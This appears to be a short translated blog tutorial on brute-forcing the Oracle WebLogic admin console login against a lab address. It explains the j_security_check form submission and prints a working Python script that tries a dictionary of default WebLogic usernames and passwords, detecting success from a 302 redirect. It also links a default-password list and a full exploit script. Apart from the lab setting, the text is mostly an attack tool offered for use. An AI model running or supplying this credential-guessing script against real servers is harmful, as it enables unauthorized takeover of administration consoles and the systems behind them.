1. Weblogic installation http://www.cnblogs.com/0x4D75/p/8916428.html
2. Weblogic weak password
Weblogic commonly used weak passwords https://cirt.net/passwords?criteria=weblogic
Background login address: http://192.168.136.130:7001/console/login/LoginForm.jsp
0. Ideas
Log in to the weblogic background and see that there is no limit to the login of the background address, so you can try to write a script for blasting.
Enter a username and password at random on the login page, and use the network to view the submission status
As you can see, after clicking the submit button, the browser submits the form to http://192.168.136.130:7001/console/j_security_check address POST
j_username: web
j_password: logic
j_character_encoding: UTF-8
When submitting an error, return to the address of the landing page,
If correct, return the new address
According to this idea, the blasting script can be written.
1. python blasting script
Full script git address https://github.com/b4zinga/Explib/blob/master/weblogic.py
Key code:
def weakPasswd(self):
"""weak password"""
pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
for user in pwddict:
for pwd in pwddict:
data = {
'j_username':user,
'j_password':pwd,
'j_character_encoding':'UTF-8'
}
req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)
if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
print('[+] WebLogic username: '+user+' password: '+pwd)
return True
return False
2. Skills
When python's requests module submits data in post or get, if the returned information contains 302, requests will follow the jump by default. It is not easy to judge after the jump here, so add allow_redirects=False
parameters to requests and specify that requests do not follow the jump.